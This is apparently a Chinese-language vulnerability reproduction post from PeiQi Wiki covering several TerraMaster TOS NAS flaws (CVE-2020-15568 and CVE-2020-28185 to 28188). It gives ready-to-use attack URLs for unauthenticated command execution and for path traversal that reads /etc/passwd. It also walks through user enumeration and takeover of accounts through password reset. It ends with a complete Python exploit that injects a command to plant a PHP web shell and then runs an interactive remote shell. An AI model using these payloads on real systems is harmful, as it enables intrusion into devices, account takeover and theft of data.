TerraMaster TOS 多个漏洞复现

  • A+
所属分类:安全漏洞

TerraMaster TOS 多个漏洞复现

TerraMaster TOS 多个漏洞复现


:漏洞描述🐑

TerraMaster TOS RCE CVE-2020-28188TerraMaster TOS 任意文件读取漏洞 CVE-2020-28187TerraMaster TOS 任意账号密码修改漏洞 CVE-2020-28186TerraMaster TOS 用户枚举漏洞 CVE-2020-28185TerraMaster TOS exportUser.php 远程命令执行

二:  漏洞影响🐇


TerraMaster TOS


三:  漏洞复现🐋

TerraMaster TOS exportUser.php 远程命令执行 CVE-2020-15568

出现漏洞的文件 exportUser.php

<?phpinclude_once "./app.php"; // [1] autoload classesclass CSV_Writer{        ...    }    $type = $_GET['type'];    $csv = new CSV_Writer();if($type == 1){        $P = new person();        $data = $P->export_user($_GET['data']);        $csv->exportUser($data);    } else if($type == 2) {        $P = new person();        $data = $P->export_userGroup($_GET['data']);        $csv->exportUsergroup($data);    } else { // [2] type value is bigger than 2//xlsx通用下载        $type = 0;        $class = $_GET['cla'];        $fun = $_GET['func'];        $opt = $_GET['opt'];        $E = new $class();        $data = $E->$fun($opt); // [3] vulnerable code call        $csv->exportExcel( $data['title'], $data['data'], $data['name'], $data['save'], $data['down']);    }?>

在其他文件的代码检查期间,也发现有一种方法可以利用TOS软件中预先存在的类来利用此问题。位于include/class/application.class.php中的PHP类是在运行TOS软件的设备上执行命令的最佳人选。

由于exportUser.php没有身份验证控件,因此未经身份验证的攻击者有可能通过提供以下值作为HTTP GET参数来实现代码执行。

http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>pq.txt

返回200后再次访问

http://xxx.xxx.xxx.xxx/include/pq.txt

TerraMaster TOS 多个漏洞复现


TerraMaster TOS 用户枚举漏洞 CVE-2020-28185

漏洞点来源于找回密码的用户存在校验

TerraMaster TOS 多个漏洞复现

输入用户名 admin 点击确定,查看Burp捕获的包

其中有一个请求包用于确认用户admin是否存在

TerraMaster TOS 多个漏洞复现


存在则返回用户的邮箱信息


TerraMaster TOS 任意账号密码修改漏洞 CVE-2020-28186


首先需要知道已知用户名,可以参考 TerraMaster TOS 用户枚举漏洞 CVE-2020-28185 获取已知的用户名

重置页面输入获取的账号和邮箱

TerraMaster TOS 多个漏洞复现

点击确定,抓包更换邮箱接收验证码

TerraMaster TOS 多个漏洞复现

通过接收的验证码即可更换账号密码登录后台

TerraMaster TOS 多个漏洞复现


TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187

登陆后访问,验证漏洞的POC为

/tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd


TerraMaster TOS 多个漏洞复现


TerraMaster TOS RCE CVE-2020-28188


存在漏洞的为 /include/makecvs.php 中的Event参数

使用EXP文件上传并执行命令

TerraMaster TOS 多个漏洞复现


 四:  漏洞POC🦉

# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)# Date: 12/12/2020# Exploit Author: IHTeam# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/# Vendor Homepage: https://www.terra-master.com/# Version: <= 4.2.06# Tested on: 4.1.30, 4.2.06#!/usr/bin/env python3import argparseimport requestsimport timeimport sysimport urllib.parsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE")parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/")args = parser.parse_args()url = args.urlheaders = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}epoch_time = int(time.time())shell_filename = "debug"+str(epoch_time)+".php"def check_endpoint(url, headers):  response = requests.get(url+'/version', headers=headers, verify=False)if response.status_code == 200:    print("[+] TerraMaster TOS version: ", str(response.content))else:    print("n[-] TerraMaster TOS response code: ", response.status_code)    sys.exit()def upload_shell(url, headers, shell_filename):  payload = "http|echo "<?php echo(passthru(\$_GET['cmd']));?>" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||"  payload = urllib.parse.quote(payload, safe='')  print("[/] Uploading shell...")  response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)  time.sleep(1)  response = requests.get(url+'/'+shell_filename+'?cmd=cat /etc/passwd', headers=headers, verify=False)if ('root:' in str(response.content, 'utf-8')):    print("[+] Upload succeeded")else:    print("n[-] Error uploading shell: ", response.content)    sys.exit()def interactive_shell(url, headers, shell_filename, cmd):  response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)  print(str(response.text)+"n")def delete_shell(url, headers, shell_filename):  delcmd = "rm /usr/www/"+shell_filename  response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)  print("n[+] Shell deleted")upload_shell(url, headers, shell_filename)try:while True:    cmd = input("# ")    interactive_shell(url, headers, shell_filename, cmd)except:  delete_shell(url, headers, shell_filename)


参考链接

https://mp.weixin.qq.com/s/w7gF4V9TMbYeknWaYNXctA


 五:  关于文库🦉



    在线文库:

http://wiki.peiqi.tech


    Github:

https://github.com/PeiQi0/PeiQi-WIKI-POC

TerraMaster TOS 多个漏洞复现


最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

别忘了Github下载完给个小星星⭐


同时知识星球也开放运营啦,希望师傅们支持支持啦🐟

知识星球里会持续发布一些漏洞公开信息和技术文章~

TerraMaster TOS 多个漏洞复现



由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


PeiQi文库 拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

本文始发于微信公众号(PeiQi文库):TerraMaster TOS 多个漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: